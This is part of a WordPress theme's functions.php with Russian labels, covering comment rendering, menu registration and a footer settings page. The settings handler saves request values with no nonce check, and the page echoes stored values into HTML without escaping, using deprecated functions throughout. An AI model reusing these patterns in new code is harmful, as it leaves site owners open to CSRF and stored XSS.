<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
